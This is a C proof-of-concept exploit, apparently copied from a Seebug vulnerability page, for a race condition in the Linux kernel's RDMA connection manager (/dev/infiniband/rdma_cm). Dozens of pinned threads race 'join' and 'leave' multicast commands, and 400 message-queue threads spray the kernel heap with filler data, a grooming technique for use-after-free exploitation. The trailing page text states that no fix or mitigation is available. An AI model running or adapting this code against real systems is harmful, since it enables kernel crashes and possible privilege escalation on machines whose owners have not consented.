/*
 * Multi-threaded test driver for /dev/infiniband/rdma_cm.
 *
 * What the code does:
 *   - main() maps a fixed scratch region at 0x20000000, creates a System V
 *     message queue and starts 250 sender and 150 receiver threads on it,
 *     then forks a child that runs loop().
 *   - loop() starts RDMATHREADS worker threads (thr) and repeatedly runs
 *     test(), which opens the device and dispatches three write() commands
 *     (labelled "create", "join" and "leave" by the original author) to the
 *     workers through futex-based hand-off.
 *
 * NOTE(review): the original author's notes state that the "leave" command
 * races with the "join" command inside the kernel; that is not verifiable
 * from this file alone.
 */
#define _GNU_SOURCE

#include <endian.h>
#include <limits.h>
#include <linux/futex.h>
#include <pthread.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <time.h>
#include <unistd.h>

#define SEND 1
#define RECV 0
#define RDMATHREADS 30

/* Upper bound (20 ms) on how long a dispatcher waits for a worker call. */
#define CALL_WAIT_NSEC (20 * 1000 * 1000)

static void test(void);
void createThreads(void);
void testTreadWake(void);
void exitRdmaThreads(void);

/* Create the worker threads once, then run test() forever. */
void loop(void)
{
    createThreads();
    for (;;) {
        test();
    }
}

/* Per-worker state; `running` doubles as the futex word used for hand-off. */
struct thread_t {
    int created, running, call, CPUNumber, exitFlag;
    pthread_t th;
};

/* Parameters handed to a message-queue thread (and to setAffinity). */
struct msgInfo {
    int msgid;
    int CPUNumber;
    int sendOrRecv; /* SEND (1): send ; RECV (0): receive */
};

/* Message payload shared by every sender and receiver thread. */
struct {
    long mtype;
    char mtext[0xAC];
} msg = {0x42, {0}};

static struct thread_t *threads;
static void execute_call(int call);
static int running;
static int collide;
int threadWaittingNum = 0;
int sendCount = 0;
int *sendNum = NULL;
int *threadWaitting;
int *threadRunning;
int *ipcThreadStop;
void setAffinity(void *arg);

/*
 * Block on the futex word at `uaddr` while it still holds `expected`.
 * `timeout` may be NULL to wait without a time limit.
 */
static long futex_wait(int *uaddr, int expected, const struct timespec *timeout)
{
    return syscall(SYS_futex, uaddr, FUTEX_WAIT, expected, timeout, NULL, 0);
}

/*
 * Wake up to `nr_wake` waiters blocked on `uaddr`.
 * The count is always passed explicitly: omitting it from the variadic
 * syscall() hands the kernel an indeterminate value.
 */
static long futex_wake(int *uaddr, int nr_wake)
{
    return syscall(SYS_futex, uaddr, FUTEX_WAKE, nr_wake, NULL, NULL, 0);
}

/*
 * Worker thread body.
 *
 * Pins itself to th->CPUNumber, then loops: sleep until `running` becomes
 * non-zero, run the requested call, clear `running` and wake the dispatcher.
 * When `exitFlag` is set the thread wakes the dispatcher, detaches itself
 * and returns.
 */
static void *thr(void *arg)
{
    struct thread_t *th = arg;
    struct msgInfo cpu_info = { .CPUNumber = th->CPUNumber };

    setAffinity(&cpu_info);
    for (;;) {
        while (!__atomic_load_n(&th->running, __ATOMIC_ACQUIRE)) {
            futex_wait(&th->running, 0, NULL);
        }
        if (__atomic_load_n(&th->exitFlag, __ATOMIC_ACQUIRE)) {
            futex_wake(&th->running, INT_MAX);
            pthread_detach(pthread_self());
            return NULL;
        }
        execute_call(th->call);
        __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
        __atomic_store_n(&th->running, 0, __ATOMIC_RELEASE);
        futex_wake(&th->running, INT_MAX);
    }
}

int threadNum = 0;

/*
 * Allocate the shared thread table and start every worker that is not yet
 * marked as created. Worker 0 is assigned CPU 0, all others CPU 1.
 * Exits the process if the table cannot be mapped; a worker that fails to
 * start is reported and left marked as not created.
 */
void createThreads(void)
{
    threads = mmap(NULL, sizeof(*threads) * RDMATHREADS, PROT_READ | PROT_WRITE,
                   MAP_ANONYMOUS | MAP_SHARED, -1, 0);
    if (threads == MAP_FAILED) {
        perror("mmap threads");
        exit(1);
    }

    for (int i = 0; i < RDMATHREADS; i++) {
        struct thread_t *th = &threads[i];
        pthread_attr_t attr;
        int policy = 0;
        int rc;

        if (th->created) {
            continue;
        }
        th->created = 1;
        th->exitFlag = 0;
        th->CPUNumber = (i == 0 ? 0 : 1);

        pthread_attr_init(&attr);
        pthread_attr_setstacksize(&attr, 128 << 10);
        /* pthread_create reports failure through its return value, not errno. */
        rc = pthread_create(&th->th, &attr, thr, th);
        if (rc != 0) {
            fprintf(stderr, "pthread_create(%d): %s\n", i, strerror(rc));
            th->created = 0;
            pthread_attr_destroy(&attr);
            continue;
        }
        pthread_attr_getschedpolicy(&attr, &policy);
        pthread_setschedprio(th->th, sched_get_priority_min(policy));
        pthread_attr_destroy(&attr);
    }
}

/* Debug helper: print the call id, the shared send counter and a timestamp. */
void readTime(int call)
{
    struct timeval tv;

    printf("run at %d\n", call);
    gettimeofday(&tv, NULL);
    printf("sendNum is ==== %d at %d \n", __atomic_load_n(sendNum, __ATOMIC_ACQUIRE), call);
    /* The value is seconds * 1e6 + microseconds, i.e. microseconds. */
    printf("microsecond:%lld\n", (long long)tv.tv_sec * 1000000 + tv.tv_usec);
}

/* r[0]: device fd; r[1], r[2]: ids read back from the create/join replies. */
uint64_t r[3] = {0xffffffffffffffff, 0xffffffff, 0xffffffff};
uint64_t procid;

/*
 * Build one command in the fixed scratch region and write() it to r[0].
 *
 * call 0 ("create"): on success stores the 32-bit reply at 0x20000040 in r[1].
 * call 1 ("join"):   uses r[1] as the id, resets *sendNum, and on success
 *                    stores the 32-bit reply at 0x20000140 in r[2].
 * call 2 ("leave"):  resets *sendNum and writes the command with id 0.
 * Any other value is ignored.
 */
static void execute_call(int call)
{
    long res;

    switch (call) {
    case 0:
        *(uint32_t *)0x20000080 = 0;
        *(uint16_t *)0x20000084 = 0x18;
        *(uint16_t *)0x20000086 = 0xfa00;
        *(uint64_t *)0x20000088 = 2;
        *(uint64_t *)0x20000090 = 0x20000040;
        *(uint16_t *)0x20000098 = 0x111;
        *(uint8_t *)0x2000009a = 0xd;
        *(uint8_t *)0x2000009b = 0;
        *(uint8_t *)0x2000009c = 0;
        *(uint8_t *)0x2000009d = 0;
        *(uint8_t *)0x2000009e = 0;
        *(uint8_t *)0x2000009f = 0;
        res = syscall(__NR_write, r[0], 0x20000080, 0x20); /* create */
        if (res != -1) {
            r[1] = *(uint32_t *)0x20000040;
        }
        break;
    case 1:
        printf("join.........\n");
        *(uint32_t *)0x20000180 = 0x16;
        *(uint16_t *)0x20000184 = 0x98;
        *(uint16_t *)0x20000186 = 0xfa00;
        *(uint64_t *)0x20000188 = 0x20000140;
        *(uint64_t *)0x20000190 = 3;
        *(uint32_t *)0x20000198 = r[1];
        *(uint16_t *)0x2000019c = 0x10;
        *(uint16_t *)0x2000019e = 1;
        *(uint16_t *)0x200001a0 = 2;
        *(uint16_t *)0x200001a2 = htobe16(0x4e23);
        *(uint8_t *)0x200001a4 = 0xac;
        *(uint8_t *)0x200001a5 = 0x14;
        *(uint8_t *)0x200001a6 = 0x14;
        *(uint8_t *)0x200001a7 = 0xbb;
        *(uint8_t *)0x200001a8 = 0;
        *(uint8_t *)0x200001a9 = 0;
        *(uint8_t *)0x200001aa = 0;
        *(uint8_t *)0x200001ab = 0;
        *(uint8_t *)0x200001ac = 0;
        *(uint8_t *)0x200001ad = 0;
        *(uint8_t *)0x200001ae = 0;
        *(uint8_t *)0x200001af = 0;
        __atomic_store_n(sendNum, 0, __ATOMIC_RELEASE);
        /*
         * Original author's note: ucma_join_multicast allocates "mc" and
         * frees it together with "ctx" if an error occurs.
         */
        res = syscall(__NR_write, r[0], 0x20000180, 0xa0);
        if (res != -1) {
            r[2] = *(uint32_t *)0x20000140;
        }
        break;
    case 2:
        *(uint32_t *)0x20000240 = 0x11;
        *(uint16_t *)0x20000244 = 0x10;
        *(uint16_t *)0x20000246 = 0xfa00;
        *(uint64_t *)0x20000248 = 0x20000100;
        *(uint32_t *)0x20000250 = 0; /* set id */
        *(uint32_t *)0x20000254 = 0;
        __atomic_store_n(sendNum, 0, __ATOMIC_RELEASE);
        /*
         * Original author's note: ucma_leave_multicast() looks up "mc" and
         * uses it together with "ctx".
         */
        syscall(__NR_write, r[0], 0x20000240, 0x18);
        break;
    default:
        break;
    }
}

/* Hand `call` to worker `th` and wake it; does nothing if it was never created. */
static void dispatch_call(struct thread_t *th, int call)
{
    if (!th->created) {
        return;
    }
    __atomic_store_n(&th->call, call, __ATOMIC_RELEASE);
    __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
    __atomic_store_n(&th->running, 1, __ATOMIC_RELEASE);
    futex_wake(&th->running, INT_MAX);
}

/* Wait (at most CALL_WAIT_NSEC) for worker `th` to clear its `running` word. */
static void wait_call_done(struct thread_t *th)
{
    const struct timespec ts = { .tv_sec = 0, .tv_nsec = CALL_WAIT_NSEC };

    futex_wait(&th->running, 1, &ts);
}

/* Release the message-queue threads, then dispatch call 1 to worker 0. */
void runJoin(void)
{
    __atomic_store_n(threadRunning, 1, __ATOMIC_RELEASE);
    futex_wake(threadWaitting, __atomic_load_n(&threadWaittingNum, __ATOMIC_RELAXED));
    dispatch_call(&threads[0], 1);
}

int count = 0;

/* Dispatch `call` to worker `threadNum` and wait briefly for it to finish. */
void runCreateOrLeave(int call, int threadNum)
{
    struct thread_t *th = &threads[threadNum];

    dispatch_call(th, call);
    wait_call_done(th);
}

/* Dispatch `call` to worker `threadNum` without waiting for completion. */
void runCreateOrLeaveNoWait(int call, int threadNum)
{
    dispatch_call(&threads[threadNum], call);
}

/*
 * Ask every created worker to exit, unmap the thread table and, if any
 * messages were counted as sent, wait on ipcThreadStop.
 */
void exitRdmaThreads(void)
{
    wait_call_done(&threads[0]);

    for (int i = 0; i < RDMATHREADS; i++) {
        struct thread_t *th = &threads[i];

        if (!th->created) {
            continue;
        }
        th->created = 0;
        __atomic_store_n(&th->exitFlag, 1, __ATOMIC_RELEASE);
        __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
        __atomic_store_n(&th->running, 1, __ATOMIC_RELEASE);
        futex_wake(&th->running, INT_MAX);
        wait_call_done(th);
    }
    munmap(threads, sizeof(*threads) * RDMATHREADS);

    if (__atomic_load_n(&sendCount, __ATOMIC_ACQUIRE)) {
        futex_wait(ipcThreadStop, 1, NULL);
    }
}

/*
 * Pin the calling thread to the CPU named by ((struct msgInfo *)arg)->CPUNumber.
 * Failures are reported on stderr and otherwise ignored.
 */
void setAffinity(void *arg)
{
    const struct msgInfo *info = arg;
    cpu_set_t mask;
    cpu_set_t get;

    CPU_ZERO(&mask);
    CPU_SET(info->CPUNumber, &mask);
    /* The pthread affinity calls return a positive error number on failure. */
    if (pthread_setaffinity_np(pthread_self(), sizeof(mask), &mask) != 0) {
        fprintf(stderr, "set thread affinity failed\n");
    }
    CPU_ZERO(&get);
    if (pthread_getaffinity_np(pthread_self(), sizeof(get), &get) != 0) {
        fprintf(stderr, "get thread affinity failed\n");
    }
}

/*
 * Message-queue thread body; never returns.
 *
 * SEND threads: wait on threadWaitting, then msgsnd() the shared message for
 * as long as *threadRunning is non-zero, counting each send.
 * RECV threads: wait on threadWaitting, then msgrcv() while sendCount is
 * non-zero (sleeping one second whenever fewer than 5 are outstanding) and
 * finally wake ipcThreadStop.
 * Either kind exits the process if its queue operation fails.
 */
void *holeThread(struct msgInfo *msgInfo)
{
    const int msgid = msgInfo->msgid;

    /* Pass the msgInfo object itself, not the address of the local pointer. */
    setAffinity(msgInfo);

    if (msgInfo->sendOrRecv == SEND) {
        for (;;) {
            __atomic_fetch_add(&threadWaittingNum, 1, __ATOMIC_RELAXED);
            futex_wait(threadWaitting, 1, NULL);
            while (__atomic_load_n(threadRunning, __ATOMIC_ACQUIRE)) {
                if (msgsnd(msgid, &msg, sizeof(msg.mtext), 0) == -1) {
                    perror("msgsnd");
                    exit(1);
                }
                __atomic_fetch_add(&sendCount, 1, __ATOMIC_RELAXED);
                __atomic_fetch_add(sendNum, 1, __ATOMIC_RELAXED);
            }
            __atomic_fetch_sub(&threadWaittingNum, 1, __ATOMIC_RELAXED);
        }
    } else {
        for (;;) {
            __atomic_fetch_add(&threadWaittingNum, 1, __ATOMIC_RELAXED);
            futex_wait(threadWaitting, 1, NULL);
            while (__atomic_load_n(&sendCount, __ATOMIC_ACQUIRE)) {
                if (__atomic_load_n(&sendCount, __ATOMIC_ACQUIRE) < 5) {
                    usleep(1000 * 1000);
                    continue;
                }
                if (msgrcv(msgid, &msg, sizeof(msg.mtext), 0x42, 0) == -1) {
                    perror("msgrcv error !!!!");
                    exit(1);
                }
                __atomic_fetch_sub(&sendCount, 1, __ATOMIC_RELAXED);
            }
            futex_wake(ipcThreadStop, INT_MAX);
            __atomic_fetch_sub(&threadWaittingNum, 1, __ATOMIC_RELAXED);
        }
    }
}

/* pthread start routine with the signature pthread_create() requires. */
static void *hole_thread_entry(void *arg)
{
    return holeThread(arg);
}

/*
 * Start one message-queue thread running holeThread(msgInfo) and give it the
 * maximum priority of the default scheduling policy. `msgInfo` must outlive
 * the thread.
 */
void createHoleThreads(struct msgInfo *msgInfo)
{
    pthread_t tid;
    pthread_attr_t thAttr;
    int policy = 0;
    int rc;

    rc = pthread_create(&tid, NULL, hole_thread_entry, msgInfo);
    if (rc != 0) {
        /* pthread_create does not set errno; decode its return value. */
        fprintf(stderr, "create thread: %s\n", strerror(rc));
        fprintf(stderr, "thread create failed\n");
        return;
    }
    pthread_attr_init(&thAttr);
    pthread_attr_getschedpolicy(&thAttr, &policy);
    pthread_setschedprio(tid, sched_get_priority_max(policy));
    pthread_attr_destroy(&thAttr);
}

/*
 * One test iteration: open the device, run "create" on worker 1, "join" on
 * worker 0, "leave" on workers 3..RDMATHREADS-1 without waiting and on
 * worker 2 with a wait, then stop the senders and close the device.
 */
static void test(void)
{
    long res;

    printf("===== run test %d ====\n", count++);
    memcpy((void *)0x20000680, "/dev/infiniband/rdma_cm", 24);
    res = syscall(__NR_openat, 0xffffffffffffff9c, 0x20000680, 2, 0);
    if (res != -1) {
        r[0] = res;
    }
    collide = 1;

    runCreateOrLeave(0, 1); /* create on worker 1 */
    runJoin();              /* join on worker 0 */
    for (int i = 3; i < RDMATHREADS; i++) {
        runCreateOrLeaveNoWait(2, i); /* leave on workers 3..RDMATHREADS-1 */
    }
    runCreateOrLeave(2, 2); /* leave on worker 2 */

    __atomic_store_n(threadRunning, 0, __ATOMIC_RELEASE);
    if (res != -1) {
        close((int)res);
    }
}

/* Debug helper: wake up to 200 threads blocked on threadWaitting. */
void testTreadWake(void)
{
    if (futex_wake(threadWaitting, 200) == -1) {
        perror("threadWaitting_1: ");
    }
}

/* Map one shared int initialised to `initial`; exits the process on failure. */
static int *map_shared_int(int initial)
{
    int *p = mmap(NULL, sizeof(*p), PROT_READ | PROT_WRITE,
                  MAP_ANONYMOUS | MAP_SHARED, -1, 0);

    if (p == MAP_FAILED) {
        perror("mmap");
        exit(1);
    }
    *p = initial;
    return p;
}

int main(void)
{
    struct msgInfo sendHoleInfo;
    struct msgInfo recvHoleInfo;
    int msgid;

    /* Scratch region that execute_call() and test() address by constant. */
    if (mmap((void *)0x20000000, 0x1000000, PROT_READ | PROT_WRITE,
             MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        perror("mmap fixed region");
        exit(1);
    }
    memset(msg.mtext, '\x41', sizeof(msg.mtext));

    threadWaitting = map_shared_int(1);
    threadRunning = map_shared_int(0);
    ipcThreadStop = map_shared_int(1);
    sendNum = map_shared_int(0);

    if ((msgid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
        perror("msgget");
        exit(1);
    }

    sendHoleInfo = (struct msgInfo){ .msgid = msgid, .CPUNumber = 0, .sendOrRecv = SEND };
    recvHoleInfo = (struct msgInfo){ .msgid = msgid, .CPUNumber = 1, .sendOrRecv = RECV };

    printf("Creating ipc msg threads\n");
    for (int i = 0; i < 250; i++) {
        createHoleThreads(&sendHoleInfo);
    }
    for (int i = 0; i < 150; i++) {
        createHoleThreads(&recvHoleInfo);
    }
    printf("Ipc msg threads are created\n");

    for (procid = 0; procid < 1; procid++) {
        pid_t pid = fork();

        if (pid == -1) {
            perror("fork");
        } else if (pid == 0) {
            loop(); /* child: never returns */
        }
    }

    printf("ending..................\n");
    /* Keep the parent (and the msgInfo objects its threads use) alive. */
    sleep(1000000);
    return 0;
}
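/*
 * Residual text from the web page this listing was copied from
 * (not part of the program; translated from Chinese):
 *
 *   No temporary workaround available.
 *   No official fix available.
 *   No mitigation available.
 *   Note: all content, code and services provided by this site are for
 *   study only; do not use them for illegal purposes, otherwise you bear
 *   the consequences yourself.
 *   Remaining redemptions on your membership:
 *   time(s)
 *   This redemption will consume 1 credit.
 *   To renew, please call the customer service hotline. Thank you for your
 *   continued support of Seebug!
 *   No comments yet.
 */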